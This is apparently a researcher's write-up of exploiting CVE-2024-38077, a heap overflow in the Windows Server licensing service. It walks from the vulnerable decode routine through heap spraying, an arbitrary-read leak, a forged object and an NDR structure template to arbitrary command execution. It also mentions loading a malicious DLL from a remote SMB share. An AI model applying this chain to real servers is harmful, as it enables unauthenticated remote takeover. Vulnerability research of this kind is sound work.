Also known as madlicense, a vulnerability on almost every versions of windows server that leads to 0-click RCE

1. Vuln Analyze

1.1 Call Stack

 # Child-SP          RetAddr               Call Site

00 000000b9`d2ffbd30 00007fff`67a76fec     lserver!CDataCoding::DecodeData
01 000000b9`d2ffbd70 00007fff`67a5c793     lserver!LKPLiteVerifyLKP+0x38
02 000000b9`d2ffbdc0 00007fff`67a343eb     lserver!TLSDBTelephoneRegisterLicenseKeyPack+0x163
03 000000b9`d2ffd7d0 00007fff`867052a3     lserver!TLSRpcTelephoneRegisterLKP+0x15b
04 000000b9`d2fff0c0 00007fff`8664854d     RPCRT4!Invoke+0x73
05 000000b9`d2fff120 00007fff`86647fda     RPCRT4!NdrStubCall2+0x30d
06 000000b9`d2fff3d0 00007fff`866b7967     RPCRT4!NdrServerCall2+0x1a

1.2 Vuln

__int64 __fastcall CDataCoding::DecodeData(CDataCoding *this, wchar_t *a2, unsigned __int8 **a3, unsigned int *a4)
{
  unsigned int v4; // edi
  int v8; // ebp
  unsigned int v9; // ebx
  HANDLE ProcessHeap; // rax
  unsigned __int8 *v11; // rax
  unsigned __int8 *v12; // rbx
  wchar_t *v13; // rax
  __int64 v14; // rcx
  unsigned __int8 *v15; // rdx
  __int64 v16; // r9
  unsigned int v17; // ecx
  HANDLE v18; // rax

  v4 = 0;
  v8 = 0;
  if ( a3 )
  {
    v9 = dwBytes; // Always be 21
    *a3 = 0LL;
    *a4 = 0;
    ProcessHeap = GetProcessHeap();
    v11 = (unsigned __int8 *)HeapAlloc(ProcessHeap, 8u, v9);   // fixed size
    v12 = v11;
    if ( v11 )
    {
      memset_0(v11, 0, (unsigned int)dwBytes);
      while ( *a2 )
      {
        // str: BCDFGHJKMPQRTVWXY2346789 a2: usercontrol
        v13 = wcschr_0(Str, *a2);
        if ( !v13 )
        {
          v4 = 13;
          v18 = GetProcessHeap();
          HeapFree(v18, 0, v12);
          return v4;
        }
        // a2 from base24 to base 10
        v14 = v13 - Str;
        v15 = v12;
        v16 = (unsigned int)(v8 + 1);
        do
        {
          v17 = dword_1800D61C8 * *v15 + v14;
          *v15++ = v17;
          LODWORD(v14) = v17 >> 8;
          --v16;
        }
        while ( v16 );
        if ( (_DWORD)v14 )
          v12[++v8] = v14; // move base10 to buffer
        ++a2;
      }
      *a4 = dwBytes;
      *a3 = v12;
    }
    else
    {
      return 8;
    }
  }
  else
  {
    return 87;
  }
  return v4;
}

Heap overflow without restriction

1.3 Vuln Component

lserver.dll loaded by svchost.exe

TLSRpcTelephoneRegisterLKP() function

2. Heap Manage Mechanism

It used segment heap

We mainly foucus on LFH since it`s vulnerable

  • headless
  • randomly allocated

3. Exploitation

3.1 Enable LFH

Bucket activation occurs if there are 17 active allocations for the bucket’s allocation size.

Bucket activation also occurs if there are 2,040 allocation requests for the bucket’s allocation size.

Here we allocate 2,040 chunks with size 0x20 to enable LFH.

TLSRpcRegisterLicenseKeyPack() takes in encrypted payload and allocate memory for the payload after decryption. So we can allocate arbitary memory with it.

Here we use TLSRpcRegisterLicenseKeyPack() to spray 0x20 chunks.

3.2 Leak Address

The widely used lpContext structure is allocated in each TLSRpcConnect() and returned as a handle.

typedef struct __ClientContext {

    LPTSTR  m_Client;
    long    m_RefCount;
    DWORD   m_ClientFlags;

    DWORD   m_LastError;
    CONTEXTHANDLE_TYPE m_ContextType;
    HANDLE  m_ContextHandle;

    // NEEDED - A list to store all memory/handle
    //          allocated for the client

} CLIENTCONTEXT, *LPCLIENTCONTEXT;

And its 0x20 large, which means it will be allocated in the same bucket with our vulnerable buffer.

Thus we can srpay handles with TLSRpcConnect(), free some handles, and then allocate vulnerable buffer with TLSRpcTelephoneRegisterLKP(). We will easily overflow to the lpcontext structure. And the pointers in the structure is potential.

TLSRpcRetrieveTermServCert() takes the lpcontext as argument, and

SAFESTRCPY(LicenseRequest.szMachineName, lpContext->m_Client);
SAFESTRCPY(LicenseRequest.szUserName, lpContext->m_Client);

Finally, it returns the ppbCert containing the LicenseRequest

Since lpContext->m_Clinet is easy to forge, we get an AAR.

3.3 Hijack rip

3.3.1 Hijack Controlflow

TLSRpcKeyPackEnumNext() -> TLSDBLicenseKeyPackEnumNext() -> TLSDBKeyPackEnumNext() -> lpContext->m_ContextHandle->pbWorkSpace->m_LicPackTable.EnumerateNext()

It finally calls a virtual function related to lpContext

error_status_t 
TLSRpcKeyPackEnumNext( 
    /* [in] */ PCONTEXT_HANDLE phContext,
    /* [ref][out] */ LPLSKeyPack lpKeyPack,
    /* [ref][out][in] */ PDWORD dwErrCode
    )
{
    ...
    LPENUMHANDLE hEnum=(LPENUMHANDLE)lpContext->m_ContextHandle;
    status=TLSDBLicenseKeyPackEnumNext( 
                            hEnum, 
                            lpKeyPack,
                            bShowAll
                        );
    ...
}

DWORD 
TLSDBLicenseKeyPackEnumNext(
    LPENUMHANDLE lpEnumHandle, 
    LPLSKeyPack lpLsKeyPack,
    BOOL bShowAll
    )
{
    ...
    switch(lpEnumHandle->chFetchState)
    {
        case ENUMHANDLE::FETCH_NEXT_KEYPACK:
            dwStatus=TLSDBKeyPackEnumNext(
                                lpEnumHandle->pbWorkSpace, 
                                &lpEnumHandle->CurrentKeyPack
                            );
    ...
}

DWORD
TLSDBKeyPackEnumNext( 
    IN PTLSDbWorkSpace pDbWkSpace, 
    IN OUT PTLSLICENSEPACK lpKeyPack
    )
{
    ...
    LicPackTable& licpackTable=pDbWkSpace->m_LicPackTable;
    switch(licpackTable.EnumerateNext(*lpKeyPack))
    ...
}

So in the TLSDBKeyPackEnumNext, we can control the overflow to

lpContext->m_ContextHandle->pbWorkSpace->m_LicPackTable.EnumerateNext()

In disassembly:

__int64 __fastcall TLSDBKeyPackEnumNext(__int64 *a1, void *a2)
{
  if ( a1 && a2 )
  {
    (*(void (__fastcall **)(__int64 *, void *, _QWORD, _QWORD))(*a1 + 0x70))(a1, a2, 0LL, 0LL);
    v3 = (*(__int64 (__fastcall **)(__int64 *))(*a1 + 0x1F0))(a1);
    ...

3.3.2 Leak Fake Object Address

Since we need to forge the function pointer, we need to forge the whole m_ContextHandle. Then we must obtain our fake obj address because it contains some layers of pointers.

Review our segment heap mechenism. We learn that LFH and VS are allocated from the Backend Allocator, and Luckily, the _SEGMENT_HEAP contains the information of the last block of current backend heap.

Now that we have AAR primitive, we can obtain the last block address, and blocks are allocated continuously. So we will spray our fakeobj, and we can predict an address before that.

3.3.3 Construct Fake Object

Now we have fakeobj address. Just forge the object with its defination

//lpContext->m_ContextHandle
typedef struct __ENUMHANDLE {
    typedef enum {
        FETCH_NEXT_KEYPACK=1,
        FETCH_NEXT_KEYPACKDESC,
        FETCH_NEW_KEYPACKDESC
    } ENUM_FETCH_CODE;

    PTLSDbWorkSpace pbWorkSpace;
    TLSLICENSEPACK  CurrentKeyPack;

    LICPACKDESC     KPDescSearchValue;
    DWORD           dwKPDescSearchParm;
    BOOL            bKPDescMatchAll;
    CHAR            chFetchState;
} ENUMHANDLE, *LPENUMHANDLE;


//lpContext->m_ContextHandle->pbWorkSpace
typedef struct __TlsDbWorkSpace {

    static JBInstance g_JbInstance;

    JBSession  m_JetSession;
    JBDatabase m_JetDatabase;


    LicPackTable            m_LicPackTable; // Target
    LicensedTable           m_LicensedTable;
    ...

} TLSDbWorkSpace, *LPTLSDbWorkSpace, *PTLSDbWorkSpace;

3.4 Hijack Arguments

As the graph indicates above, the rcx is a pointer to the pbWorkSpace, which is unuseable in most of the cases. Because its first element must be *m_LicPackTable.

Then we look into the magical NdrServerCall2(). It receives a pointer to structure RpcMsg as the only argument, and finally calls the structure related pointer with structure related argument list (though rather complicated).

NdrServerCall2() -> NdrStubCall2() -> ... -> Invoke()

Anyway, the function is so f complicated. It does so many things to parse RpcMsg, most parts can be easily(?) bypassed by constructing structures.

The hardest part is that they deliver the attributes of arguments in a certain formated string. After reversing, I made a template for better use.

    pbWorkSpace += b"\x32\x48"
    pbWorkSpace += b"\x00\x00\x00\x00"
    pbWorkSpace += b"\x00\x00" #procNum
    pbWorkSpace += p16(argnum * 8) #stacksize
    # pbWorkSpace += b"\x30\xe0\x00\x00\x00\x00"
    # NdrInfo.pProcDesc
    pbWorkSpace += b"\xc0\x00\x10\x00" #ClientBufferSize & ServerBufferSize
    pbWorkSpace += b"\x40" #Oi2Flags
    pbWorkSpace += p8(argnum * 2) #NumberParams
    # NdrExts
    pbWorkSpace += b"\x0a" #Size
    pbWorkSpace += b"\x01\x00\x00" #Flags2 & ClientCorrHint & ServerCorrHint
    pbWorkSpace += b"\x00\x00\x00\x00" #NotifyIndex
    pbWorkSpace += b"\x00\x00"
    # Params
    for i in range(argnum * 2):
        pbWorkSpace += p16(0x48)
        pbWorkSpace += p16(i * 4)
        pbWorkSpace += p16(0x09)

Finally, we get an arbitary call with aribitary arguments (though the fakeobj looks scary).

3.5 After Arbitary Call

Now we have one arbitary call, and then crash.

Because of CFG(Control Flow Guard), we are not able to do ROP or shellcode.

The method from the origin author is using LoadLibraryA() to load an evil dll from remote smb server. But as a low priviledge user, I found it forbiddend to load dll into svchost.exe from remote smb, though loading from local is possible.

Then I turned into CreatProcessA(), similar to Winexec(). We can execute cmd command now.

Notice:

  • CreatProcessA() is NOT equal to cmd. Only one command is allowed, that means ‘&&’, ‘&’, ‘|’ are not allowed. So we have to use cmd.exe /C "xxx" to execute multipule command at a time.
  • cmd.exe /C "xxx" only allows double quotation marks
  • I failed to load powershell.exe, maybe related to some policy

4. References

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38077